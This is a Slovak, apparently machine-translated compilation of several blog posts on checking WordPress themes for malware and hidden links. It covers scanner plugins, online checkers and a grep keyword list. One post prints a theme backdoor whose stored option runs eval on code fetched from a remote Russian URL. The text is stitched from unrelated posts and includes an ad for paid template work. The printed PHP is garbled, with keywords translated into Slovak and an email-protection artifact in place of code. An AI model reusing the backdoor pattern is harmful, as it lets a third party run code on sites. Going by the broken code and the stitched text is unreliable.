Dobrý deň, priatelia. Ste si istý, že bezplatná šablóna WordPress, ktorú používate pre svoje weby a blogy, je skutočne bezpečná a neobsahuje skryté hrozby a škodlivý kód? Si si tým úplne istý? Absolútne?)
Myslíte si, že prešli šablónu, odstránili z nej skryté odkazy a je hotovo. Pravidelne skenujete súbory stránok antivírusom, pozeráte sa do nástrojov správcu webu Yandex na karte Zabezpečenie a s úľavou tam vidíte správu: “ Na stránke sa nenašiel žiadny škodlivý kód«.
To som si myslel aj ja. Nechcem ťa naštvať, ale...
Skrytý nebezpečný kód v bezplatných témach WordPress
Toto je list, ktorý som minulý týždeň dostal poštou z môjho hostingu. Nedávno zaviedli pravidelnú kontrolu všetkých súborov stránky na škodlivý obsah a napriek tomu u mňa našli tento obsah!
Všetko to začalo tým, že som jedného dňa išiel na svoju stránku a nemohol som ju spustiť - objavil sa urážlivý nápis o nenájdených súboroch s príponou php. Po miernom napätí som si išiel preštudovať obsah priečinka so stránkou na hostingu a okamžite som zistil problém - môj súbor šablóny fuctions.php bol premenovaný na functions.php.malware, čo, ako to bolo, nejednoznačne naznačovalo - tu fungoval antivírus alebo niečo podobné) Po zadaní pošty som našiel vyššie uvedenú správu od hostiteľa.
Prvá vec, ktorú som samozrejme urobil, bola kontrola daný súbor, študoval jeho obsah, skenoval ho rôznymi antivírusmi, desiatkami online služby na kontrolu vírusov atď. - nakoniec som nič nenašiel, všetci jednomyseľne tvrdili, že súbor je úplne bezpečný. Samozrejme som hostiteľovi vyjadril svoje pochybnosti s tým, že ste niečo pokazili, ale pre každý prípad som ich požiadal o poskytnutie správy o objavení škodlivého kódu.
A toto mi povedali
Išiel som na google informácie o tomto kóde a vážne som o tom premýšľal ...
Ako nájsť kúsok škodlivého kódu v šablóne
Ako sa ukázalo, ide o skutočne netriviálny trik, ktorý umožňuje záujemcom prenášať údaje na váš web a meniť obsah stránok bez vášho vedomia! Ak používate bezplatnú šablónu, potom Dôrazne odporúčam, aby ste skontrolovali nasledujúci kód v súbore functions.php:
add_filter('the_content', '_bloginfo', 10001);
funkcia _bloginfo($content)(
globálny $post;
if(is_single() && ( [chránený e-mailom](get_option('blogoption'))) !== false)(
vrátiť $co;
) else return $content;
}
Aj pri mojej veľmi plytkej znalosti php je vidieť, že sa vytvára určitý filter, ktorý je naviazaný na globálnu premennú príspevok a obsah, ktoré majú na starosti zobrazovanie obsahu len na stránkach blogových príspevkov (podmienka is_single). Už je to podozrivé, nie? No, teraz sa pozrime, čo to ukáže daný kód na našej webovej stránke.
Zaujímavá možnosť blogu požadovaná v databáze tiež vyzerá veľmi podozrivo. Ideme do našej databázy údaje MySQL a nájdeme tam tabuľku s názvom wp_options, ak ste nezmenili predpony, potom bude predvolene vyzerať takto. A v ňom nájdeme pre nás zaujímavú líniu s názvom blogoption
Aká nádhera! Vidíme nasledujúcu možnosť
return eval(file_get_contents('http://wpru.ru/aksimet.php?id='.$post->ID.'&m=47&n'));
Tie. nám z určitej stránky (navyše ruskej, uvedomte si) vraciame obsah, ktorý môže niesť čokoľvek! Ľubovoľný počet odkazov, škodlivých kódov, pozmeneného textu atď. Samotná stránka pri prístupe k nej vydáva chybu prístupu 403, čo nie je prekvapujúce. Samozrejme aj túto možnosť som z databázy odstránil.
Podľa informácií od obetí sa presne obsah vášho článku zvyčajne vráti iba s jednou úpravou - namiesto akejkoľvek bodky "." v texte bol zamaskovaný otvorený odkaz! A mimochodom, táto možnosť sa zapíše do databázy pri inštalácii samotnej šablóny a potom sa kód, ktorý to robí, bezpečne sám zničí. A s takým svinstvom som žil dva roky a neprezradil mi to ani jeden antivírus či služba túto hrozbu za celý ten čas. Aby som bol úprimný, nevšimol som si, či táto technika pre mňa niekedy fungovala, alebo či môj bezpečnostný doplnok túto možnosť zablokoval (alebo možno jedna z aktualizácií WordPressa túto dieru uzavrela), ale stále je to nepríjemné.
Morálka voľného syra
Ako sa vám páči prepracovanosť našich „prekladateľov“ šablón (resp. tých, ktorí ich umiestňujú do svojich katalógov)? Nie je na vás, aby ste vystrihovali odkazy z päty) Škoda, že si nepamätám, odkiaľ som stiahol svoju šablónu, bolo to dávno, inak by som napísal pár láskavých. A ak by som v tom čase mal rovnakú skúsenosť ako teraz, tak by som určite nepoužil bezplatnú šablónu, alebo v extrémnych prípadoch nesťahoval z neznámych zdrojov!
Jednoduchšie je kúpiť si nejakú oficiálnu prémiovú šablónu za 15-20 dolárov na tej istej a žiť v pokoji s vedomím, že v nej nie sú žiadne diery a zašifrované odkazy a aj keď sú tam slabiny, vývojári určite vydajú aktualizáciu, v ktorej tieto otvory budú uzavreté. ( Mimochodom, Artem nedávno publikoval článok, kde len hovorí o prémiových šablónach a dokonca rozdáva propagačné kódy na brutálne zľavy pre tých, ktorí majú záujem)
WordPress je najpopulárnejší nástroj na vytváranie rôznych informačných stránok a blogov. Bezpečnosť vašej webovej stránky je viac ako bezpečnosť vašich údajov. Je to oveľa dôležitejšie, pretože ide aj o bezpečnosť všetkých používateľov, ktorí čítajú váš zdroj a dôverujú mu. Preto je také dôležité, aby stránka nebola infikovaná vírusmi alebo iným škodlivým kódom.
Ako ochrániť WordPress pred hackermi sa budeme zaoberať v jednom z nasledujúcich článkov, ale teraz vám chcem povedať, ako skontrolovať váš web WordPress na vírusy a škodlivý kód, aby ste sa uistili, že je všetko v bezpečí.
Úplne prvá možnosť, ktorá vám príde na myseľ, je, že vás hackeri hackli a zabudovali svoje zadné vrátka do kódu vašej stránky, aby mohli posielať spam, vkladať odkazy a iné zlé veci. Niekedy sa to stáva, ale je to dosť zriedkavé, ak aktualizujete softvér včas.
Existujú tisíce bezplatných tém a doplnkov WordPress a práve tu sa skrýva nebezpečenstvo. Jedna vec je, keď si stiahnete šablónu zo stránky WordPress, a iná, keď ju nájdete na ľavej stránke. Bezohľadní vývojári môžu do svojich produktov vkladať rôzne škodlivé kódy. Ešte väčšie riziko je, ak si stiahnete prémiové šablóny zadarmo, kde hackeri nič neriskujú a môžu pridať nejakú bezpečnostnú dieru, cez ktorú potom môžu preniknúť a urobiť si, čo potrebujú. To je dôvod, prečo je také dôležité skontrolovať, či vaša stránka wordpress neobsahuje vírusy.
Kontrola stránky wordpress na prítomnosť vírusov
Prvá vec, na ktorú by ste sa pri kontrole stránky mali pozerať, nie sú vírusy, sú to doplnky WordPress. Rýchlo a jednoducho môžete prehľadávať svoje stránky a nájsť podozrivé časti kódu, ktoré sa oplatí sledovať, či už sú v téme, doplnku alebo samotnom jadre Wodpress. Poďme sa pozrieť na niektoré z najpopulárnejších doplnkov:
1.TOC
Tento veľmi jednoduchý plugin kontroluje všetky motívy nainštalované na vašom webe na prítomnosť škodlivého kódu. Doplnok zisťuje skryté odkazy zašifrované vložením kódu base64 a tiež zobrazuje detailné informácie o zistených problémoch. Najčastejšie nájdené časti kódu nie sú vírusy, ale môžu byť potenciálne nebezpečné, preto by ste im mali venovať pozornosť.
OTVORENÉ "Vzhľad" -> "TAC" potom počkajte, kým nebudú skontrolované všetky témy.
2.VIP skener
Veľmi podobný skeneru tém TOC, ale s podrobnejšími informáciami. Rovnaké príležitosti na odhalenie odkazov, skrytého kódu a iných škodlivých vložiek. Stačí otvoriť položku VIP Scanner v sekcii nástrojov a analyzovať výsledok.
Môže stačiť odstrániť nepotrebné súbory, napríklad desktop.ini. Alebo sa musíte bližšie pozrieť na to, čo sa deje v súboroch pomocou base64.
3. Anti-Malware z GOTMLS.NET
Tento plugin vám umožňuje nielen skenovať témy a jadro stránky na vírusy, ale aj chrániť stránku pred heslom hrubou silou a rôznymi XSS, SQLInj útokmi. Vyhľadávanie sa vykonáva na základe známych podpisov a zraniteľností. Niektoré zraniteľnosti je možné opraviť na mieste. Ak chcete spustiť skenovanie súborov, otvorte "Anti Malvare" na bočnom paneli a kliknite "Spustiť skenovanie":
Pred spustením kontroly musíte aktualizovať databázy podpisov.
4.Obrana slov
Toto je jeden z najpopulárnejších doplnkov zabezpečenia WordPress a skenovania škodlivého softvéru. Okrem skenera, ktorý dokáže nájsť väčšinu záložiek v kóde WordPress, existuje ochrana v reálnom čase proti rôzne druhyútoky a útoky hrubou silou. Počas vyhľadávania plugin nájde možné problémy s rôznymi doplnkami a témami vám povie, aby ste aktualizovali WordPress.
Otvorte kartu "WP Defense" na bočnom paneli a potom prejdite na kartu "Skenovať" a stlačte "Spustiť skenovanie":
Skenovanie môže trvať určitý čas, ale po dokončení uvidíte podrobnú správu o zistených problémoch.
5.Antivírus
Toto je ďalší jednoduchý doplnok, ktorý prehľadá šablónu vašej webovej stránky na prítomnosť škodlivého kódu. Nevýhodou je, že sa skenuje len aktuálna šablóna, no informácie sú zobrazené dostatočne podrobne. Uvidíte všetky nebezpečné vlastnosti, ktoré téma má a následne si môžete podrobne analyzovať, či predstavujú nejaké nebezpečenstvo. Nájdite položku "antivírus" v nastaveniach a potom kliknite "Skenovať šablóny tém teraz":
6. Kontrola integrity
Je tiež vhodné skontrolovať integritu súbory WordPress, v prípade, že sa vírus už niekde prihlásil. Na tento účel môžete použiť doplnok Integrity Checker. Kontroluje zmeny vo všetkých súboroch jadra, doplnkov a šablón. Na konci kontroly sa zobrazia informácie o upravených súboroch.
Online služby
Existuje tiež niekoľko online služieb, ktoré vám umožňujú skontrolovať, či sa na vašej stránke vo wordpresse nenachádzajú vírusy, alebo len skontrolovať šablónu. Tu sú niektoré z nich:
themecheck.org- stiahnete si archív tém a uvidíte všetky upozornenia na možné škodlivé funkcie, ktoré sa v ňom používajú. Môžete si nielen zobraziť informácie o svojej téme, ale aj o iných témach nahraných inými používateľmi, ako aj o rôzne verzie Témy. Všetko, čo pluginy nájdu, možno nájsť na tejto stránke. Vyšetrenie témy wordpress je tiež veľmi dôležité.
virustotal.com- dobre známy zdroj, kde môžete skontrolovať svoju stránku alebo súbor šablóny na prítomnosť vírusov.
ReScan.pro- Kontrola stránok WordPress na prítomnosť vírusov pomocou tejto služby je bezplatná, na zistenie možných presmerovaní sa vykonáva statická a dynamická analýza.Skener otvorí stránky stránky. Kontroluje stránku podľa rôznych zoznamov zakázaných položiek.
sitecheck.sucuri.net- jednoduchá služba na skenovanie stránok a tém na prítomnosť vírusov. Existuje plugin pre WordPress. Detekuje nebezpečné odkazy a skripty.
Manuálna kontrola
Nič nemôže byť lepšie ako manuálne overenie. Linux má úžasný nástroj grep, ktorý vám umožňuje vyhľadávať výskyty ľubovoľných reťazcov v priečinku so súbormi. Zostáva pochopiť, čo budeme hľadať:
eval - táto funkcia vám umožňuje vykonať ľubovoľné php kód, nepoužívajú ho sebarešpektujúce produkty, ak niektorý z pluginov alebo motívu používa túto funkciu, je takmer 100% isté, že je tam vírus;
- base64_decode- šifrovacie funkcie môžu byť použité s eval na skrytie škodlivého kódu, ale môžu byť použité aj na mierové účely, takže buďte opatrní;
- sha1- iný spôsob šifrovania škodlivého kódu;
- gzinflate- kompresná funkcia, rovnaké ciele spolu s eval, napr. gzinflate(base64_decode(code);
- strrev- nie predtým prevráti reťazec dozadu, pretože variant môže byť použitý na primitívne šifrovanie;
- vytlačiť- tlačí informácie do prehliadača spolu s gzinflate alebo base64_decode je nebezpečný;
- file_put_contents- Samotný WordPress alebo doplnky môžu stále vytvárať súbory v súborovom systéme, ale ak to robí téma, mali by ste byť opatrní a skontrolovať, prečo to potrebuje, pretože môžu byť nainštalované vírusy;
- file_get_contents- vo väčšine prípadov sa používa na mierové účely, ale dá sa použiť na stiahnutie škodlivého kódu alebo čítanie informácií zo súborov;
- curl- ten istý príbeh;
- fopen- otvorí súbor na zápis, nikdy neviete čo;
- systém- funkcia vykoná príkaz v systéme Linux, ak to robí samotná téma, plugin alebo wordpress, s najväčšou pravdepodobnosťou ide o vírus;
- symbolický odkaz- vytvára symbolické odkazy v systéme, možno sa vírus snaží vytvoriť hlavné systém súborov dostupné zvonku;
- kopírovať- kopíruje súbor z jedného miesta na druhé;
- getcwd- vráti názov aktuálneho pracovného adresára;
- cwd- zmení aktuálny pracovný adresár;
- ini_get- dostáva informácie o nastaveniach PHP, často na mierové účely, ale nikdy neviete;
- error_reporting(0)- zakáže výstup akýchkoľvek chybových hlásení;
- window.top.location.href- funkcia javascript používaná na presmerovanie na iné stránky;
- hacknutý- tak, pre každý prípad, skontrolujeme, zrazu sa nám to sám hacker rozhodol povedať.
Každé jednotlivé slovo môžete v príkaze nahradiť takto:
grep -R "hacknutý" /var/www/path/to/files/wordpress/wp-content/
Alebo použite jednoduchý skript, ktorý vyhľadá všetky slová naraz:
values="base64_decode(
eval(base64_decode
gzinflate(base64_decode(
getcwd();
strrev(
chr(ord(
cwd
ini_get
window.top.location.href
kopírovať (
eval(
systém (
symbolický odkaz (
error_reporting(0)
vytlačiť
file_get_contents(
file_put_contents(
fopen(
hacknutý"
cd /var/www/path/to/files/wordpress/wp-content/
$ fgrep -nr --include \*.php "$values" *
Ahoj priatelia Idea Fox!
Neviem ako vy, ale ja v noci zle spím. Problémy s bezpečnosťou blogu ma mučia. Už žiadna sila :-)
Čítal som veľa blogov na túto tému a testoval som veľa doplnkov, ktoré pomáhajú vyriešiť tento problém. Áno, a v komentároch začali klásť otázky na tému ochrany stránky, čo ma prinútilo napísať túto poznámku.
Len si predstavte, že píšete blogy, píšete články, skúšate... A zlí somarini prídu a rozbijú vašu stránku. Myslím si, že bude veľa sklamaní.
Každý normálny bloger predsa investuje veľa času a úsilia do rozvoja svojej stránky. A pre mnohých sa blogovanie vo všeobecnosti stáva posadnutosťou ... Tu a hore, ak sa TAK stane :-)
Dobre, chápete, aké je to dôležité.
Poďme konečne na vec :)
Pred pár mesiacmi som už napísal poznámku o niečom z hackovania. Určite si ju prečítajte. Odvtedy ale ubehlo pomerne veľa času a ja som prijal dodatočné opatrenia na posilnenie všestrannej obrany.
V nasledujúcich poznámkach sa tejto problematike určite podrobne zastavím. (Tiež si pamätám a píšem o nastavení ISP)
3. Stránku kontrolujeme na iných online službách
Takéto služby sa rozviedli zjavne-neviditeľne. Mám silný názor, že mnohé z nich sú úplne hlúpe a vytvorené výhradne na zobrazovanie reklám.
Doctor Web
Vytvorený DR.Web dobrý servis na kontrolu webových stránok online. Osobne mi raz pomohol nájsť infekciu od priateľa na blogu (v súbore .htaccess bol kód tretej strany)
Kontrola je veľmi jednoduchá. Zadajte svoju adresu URL a počkajte na výsledok kontroly.
antivirus-alarm.ru
Výkonný prehľadávač webových stránok, ktorý používa až 43 antivírusové databázy od popredných svetových antivírusových spoločností.
Aj tu je všetko veľmi jednoduché. Vchádzame do URL našej stránky a so zatajeným dychom čakáme na výsledky skenovania.
Toto je to, na čo som čakal.
Všetko je čisté, môžete pokojne spať :-)
To všetko je určite dobré, no treba si nainštalovať aj pár pluginov, ktoré vôbec nezasahujú do WordPress blogov.
4. Požiadajte hostiteľa, aby skontroloval vašu stránku
Faktom je, že hostitelia sa ešte viac obávajú bezpečnostných problémov ako vy a majú výkonné ochranné nástroje. A špecializované prostriedky ochrany.
Tu sú moje dnešné novinky. Ďalej budem hovoriť o výkonný plugin, ktorá vám umožňuje výrazne chrániť váš blog WordPress pred hackovaním.
Pracujem s ním 2 mesiace a som s ním veľmi spokojný. Doteraz som to s ním riešil 3x a banoval som si: -) Skrátka je o čom rozprávať.
Jeden z míľniky pri tvorbe blogu – výber kvalitnej šablóny. Existuje veľa stránok, platených aj bezplatných. Tu však musíte byť opatrní, pretože existuje vysoká pravdepodobnosť, že spolu so súborom dostanete vírusy, škodlivé skripty a skryté odkazy.
Ale aj keď je šablóna z hľadiska bezpečnosti čistá a jej dizajn, použiteľnosť a funkčnosť vám úplne vyhovuje, neznamená to, že je všetko v poriadku. Téma musí mať platný HTML a CSS kód, ako aj spĺňať všetky štandardy CMS WordPress. S tým druhým majú problémy aj platené témy a šablóny na mieru.
Vývojári engine ho neustále vyvíjajú a autori šablón s nimi nie vždy držia krok a pri ich vytváraní používajú zastarané funkcie.
Dnes vám ukážem 2 spôsoby, ako skontrolovať, či sú témy WordPress v súlade s normami. Tieto nástroje sa používajú, keď sú pridané do oficiálneho adresára https://wordpress.org/themes/
Služba na kontrolu tém WordPress a šablón Joomla z hľadiska súladu s normami
ThemeCheck.org je bezplatná služba, ktorý umožňuje skontrolovať bezpečnosť a kvalitu šablón pre CMS WordPress a Joomla pred inštaláciou na stránku.
Ak chcete skontrolovať tému, nahrajte jej archív zo svojho počítača kliknutím na tlačidlo „Vybrať súbor“ na webovej stránke themecheck.org. Ak nechcete, aby sa výsledky kontroly ukladali do služby a sprístupňovali ich ostatným používateľom, začiarknite políčko „ Zabudnite na nahrané údaje po výsledkoch“. Teraz stlačte tlačidlo "Odoslať".
Napríklad som si zobral tému Rozhranie stiahnuté z oficiálnej stránky. 99 zo 100 – 0 kritické chyby a 1 upozornenie. To je veľmi dobrý výsledok.
V porovnaní s tým moja šablóna blogu získala skóre 0 (14 chýb a 23 upozornení). Myslím si, že pre mnohých sa výsledky nebudú veľmi líšiť, najmä ak sú témy už zastarané. Všetky komentáre s vysvetleniami, ktoré označujú súbory a riadky, kde boli nájdené, sa nachádzajú na tej istej stránke nižšie.
Úprimne povedané, veľa som tomu nerozumel, pre autorov to bude užitočnejšie a je pre mňa jednoduchšie zmeniť šablónu, ako všetko opraviť. Len neviem, kedy sa k tomu dostanem.
Domov má veľký výber predtým testovaných webových tém WordPress a Joomla s možnosťou triedenia podľa času pridania alebo hodnotenia. Po kliknutí na ne sa vám zobrazia podrobné informácie a odkazy na webovú stránku autora a stránku na stiahnutie.
Ak ste vývojár a vaša téma je 100% platná, môžete o nej používateľov informovať nastavením špeciálneho odznaku hodnotenia.
Hodnota služby ThemeCheck.org spočíva v tom, že každý správca webu ju môže použiť na výber kvalitnej témy ešte pred jej nainštalovaním na blog.
Doplnok Kontrola témy
Kompatibilitu už nainštalovanej šablóny s najnovšími štandardmi WordPress môžete skontrolovať pomocou pluginu Theme Check. Odkaz na stiahnutie Najnovšia verzia: https://wordpress.org/plugins/theme-check/
Funkcionalita pluginu je podobná službe, ktorú som opísal vyššie. Po štandardnej inštalácii a aktivácii nie je potrebné vykonávať žiadne nastavenia. Kontrola objednávky:
- Prejdite na panel správcu na stránke ponuky „ Vzhľad"-" Kontrola témy".
- Ak je nainštalovaných niekoľko, vyberte požadovanú tému z rozbaľovacieho zoznamu.
- Ak nechcete odosielať informácie, začiarknite políčko „Suppress INFO“.
- Kliknite na tlačidlo „Skontrolovať“.
Výsledky sa zobrazia na tej istej stránke.
Ako vidíte, predvolená téma Dvadsať desať tiež nie je ideálne, ale napr. Dvadsaťštrnásť nemá žiadne chyby.
Po skontrolovaní doplnku ho môžete zakázať a je lepšie ho nabudúce úplne odstrániť.
Záver. Pred inštaláciou novej WordPress šablóny si ju skontrolujte nielen pre skryté odkazy a škodlivého kódu s pluginom TAC, ale aj so službou ThemeCheck.org alebo pluginom Theme Check z hľadiska súladu s najnovšími štandardmi CMS.
P.S. Pri nedávnom prehliadaní TopSape Reader som uvidel nový SEO blog zenpr.ru, ktorý sa drží na 1. mieste medzi blogermi v počte kliknutí za mesiac. Vzhľadom na to, že jeho vek je len niečo vyše mesiaca, výsledok si zaslúži rešpekt. Dizajn v štýle minimalizmu, ak sa nedá povedať, že vôbec neexistuje, ale autor píše – prečítate si to. Všetko podnikanie a bez vody. Rovnako ako v názve blogu - "nula ďalších znakov." Odporúčam prečítať, nájdete veľa užitočných informácií.
Na internete je množstvo bezplatných šablón webových stránok. To syr zadarmo stane sa to iba v pasci na myši, každý vie a napriek tomu sa natiahne ruka, aby si stiahol takýto bezplatný a nainštaloval ho na svoj web.
Pred inštaláciou bezplatnej šablóny by nebolo na škodu skontrolovať, či neobsahuje skryté odkazy.
Umiestnením bezplatnej šablóny mnohí ani nepredpokladajú, že jednoducho nemôžu propagovať a zarábať peniaze na takejto stránke.
V jednej takejto šablóne môže byť niekoľko odkazov naraz. Je tiež dobré, ak sú vnorené odkazy na stránky podobné vašej téme, a nie na stránky pre dospelých. A budú ich len dve alebo tri, nie desiatky.
Ako inštalácia takejto bezplatnej šablóny ohrozuje vašu stránku? Stránka spadne pod filter, z ktorého sa dostať von je takmer nemožné. Stránka pod filtrami je mŕtva stránka!
Inštalácia bezplatnej šablóny na vašu stránku je ako hranie ruskej rulety. Jediná šanca nastaviť absolútne čistý vzor, rovná sa nule.
V najlepšom prípade získate 3-5 odkazov na váš web. Môžete sa, samozrejme, pokúsiť takúto šablónu vyčistiť, no sú remeselníci, ktorí do šablóny zadávajú odkazy tak, že sa odtiaľ nedajú odstrániť (šablóna je zlomená, len sa krúti).
Aby som bol úprimný, je jednoduchšie objednať si novú čistú a jedinečnú (čo sa nedá povedať o bezplatnej) šablóne, bude to stáť menej.
Napríklad za vytvorenie šablóny účtujem 200 rubľov (napíšte do Skype: oxamitta). Povedz mi, stojí to za to? Vezmite si zadarmo a stratíte stránku, ale ušetríte 200 rubľov? Wow úspory!!!
Čo ak ste však už stavili na bezplatnú šablónu? Ako skontrolovať šablónu na skryté odkazy?
Na to existuje špeciálny plugin. Nepomôže odstrániť tieto odkazy, ale identifikovať ich - prosím.
Možno nie všetko je také strašidelné a vaša šablóna má iba niekoľko externých odkazov! Chcete otestovať šablónu? Potom si stiahnite plugin z nižšie uvedeného odkazu (ak chcete zobraziť odkaz na stiahnutie pluginu, kliknite na jedno z tlačidiel sociálnych sietí).
Plugin sa štandardným spôsobom inštaluje do administračného panela stránky. O tomto videu nemá zmysel točiť, takže si dnes vystačíme s pár screenshotmi.
Nainštalujte doplnok a aktivujte ho.
Ak chcete snímku obrazovky zväčšiť, kliknite na ňu ľavým tlačidlom myši. 
Prejdite na kartu Vzhľad, TAS.
Načítava...